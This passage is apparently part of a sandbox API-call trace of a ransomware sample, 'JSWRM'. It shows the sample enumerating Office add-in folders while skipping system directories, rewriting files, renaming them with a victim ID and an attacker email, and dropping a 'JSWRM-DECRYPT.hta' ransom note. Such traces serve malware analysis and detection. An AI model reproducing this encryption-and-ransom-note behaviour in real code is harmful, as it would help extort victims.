lpMultiByteStr=0x240ef8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.fr.xap", lpUsedDefaultChar=0x0) returned 19 [0124.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0124.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0124.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0124.095] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\fr\\PowerViewRes.fr.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\fr\\powerviewres.fr.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0124.096] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=326483) returned 1 [0124.096] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0124.096] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0124.116] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.116] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0124.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0124.116] CloseHandle (hObject=0x338) returned 1 [0124.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0124.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0124.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0124.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0124.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0124.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0124.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0124.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0124.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0124.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0124.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.117] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\fr\\PowerViewRes.fr.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\fr\\powerviewres.fr.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\fr\\PowerViewRes.fr.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\fr\\powerviewres.fr.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0124.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0124.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0124.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0124.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0124.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0124.118] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x13440553, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x13440553, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x152a6704, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4fb53, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.fr.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0124.118] FindClose (in: hFindFile=0x231b00 | out: hFindFile=0x231b00) returned 1 [0124.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0124.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0124.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0124.119] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ac3a61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13aced2b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13aced2b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="gl", cAlternateFileName="")) returned 1 [0124.119] lstrcmpiW (lpString1="gl", lpString2=".") returned 1 [0124.119] lstrcmpiW (lpString1="gl", lpString2="..") returned 1 [0124.119] lstrcmpiW (lpString1="gl", lpString2="...") returned 1 [0124.119] lstrcmpiW (lpString1="gl", lpString2="windows") returned -1 [0124.119] lstrcmpiW (lpString1="gl", lpString2="recovery") returned -1 [0124.119] lstrcmpiW (lpString1="gl", lpString2="perflogs") returned -1 [0124.119] lstrcmpiW (lpString1="gl", lpString2="documents and settings") returned 1 [0124.119] lstrcmpiW (lpString1="gl", lpString2="$RECYCLE.BIN") returned 1 [0124.120] lstrcmpiW (lpString1="gl", lpString2="system volume information") returned -1 [0124.120] lstrcmpiW (lpString1="gl", lpString2="msocache") returned -1 [0124.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0124.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0124.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0124.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0124.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0124.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0124.120] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\gl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\gl\\jswrm-decrypt.hta")) returned 0xffffffff [0124.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0124.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0124.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0124.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0124.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0124.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0124.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0124.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0124.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0124.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\gl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\gl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0124.125] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.125] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0124.126] CloseHandle (hObject=0x314) returned 1 [0124.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0124.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0124.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0124.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0124.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0124.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0124.126] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\gl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\gl\\jswrm-decrypt.hta")) returned 0x20 [0124.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0124.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0124.127] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\gl\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ac3a61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13aced2b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40a6277e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231c00 [0124.127] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0124.127] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ac3a61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13aced2b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40a6277e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0124.127] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0124.127] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0124.127] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfcb7dd00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfcb7dd00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4a58, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0124.127] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0124.127] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0124.127] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0124.127] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0124.127] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0124.127] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0124.127] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0124.127] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.127] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0124.127] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0124.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2413d0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0124.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x240fc0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0124.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0124.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0124.127] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40a6277e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40a6277e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40a6277e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0124.127] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0124.128] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0124.128] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0124.128] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0124.128] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0124.128] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0124.128] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0124.128] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0124.128] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0124.128] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0124.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0124.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0124.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0124.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0124.128] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbe3ab3a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbe3ab3a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbe3ab3a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13060, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0124.128] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0124.128] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0124.128] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0124.128] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0124.128] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0124.128] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0124.128] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0124.128] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.128] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0124.128] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0124.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0124.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0124.129] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9ac3a61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9ac3a61, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9ea37c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0124.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.129] WideCharToMultiByte (in: CodePage=0xfde9, 